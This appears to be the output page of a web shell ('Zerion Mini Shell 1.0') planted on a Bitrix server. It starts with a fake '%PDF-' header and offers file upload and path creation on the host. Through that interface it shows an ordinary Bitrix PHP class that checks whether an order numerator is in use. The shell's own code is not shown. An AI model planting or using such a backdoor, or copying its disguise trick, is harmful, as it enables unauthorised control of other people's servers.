%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/home/bitrix/www/bitrix/modules/sale/lib/integration/numerator/
Upload File :
Create Path :
Current File : //proc/self/root/home/bitrix/www/bitrix/modules/sale/lib/integration/numerator/numeratororder.php

<?php
namespace Bitrix\Sale\Integration\Numerator;
use Bitrix\Main\Numerator\Numerator;
use Bitrix\Sale\Registry;

/**
 * Class NumeratorOrder
 * @package Bitrix\Sale\Integration\Numerator
 */
class NumeratorOrder
{
	/**
	 * @return bool
	 * @throws \Bitrix\Main\ArgumentException
	 * @throws \Bitrix\Main\ObjectPropertyException
	 * @throws \Bitrix\Main\SystemException
	 */
	public static function isUsedNumeratorForOrder()
	{
		return boolval(Numerator::getOneByType(Registry::ENTITY_ORDER));
	}
}

Zerion Mini Shell 1.0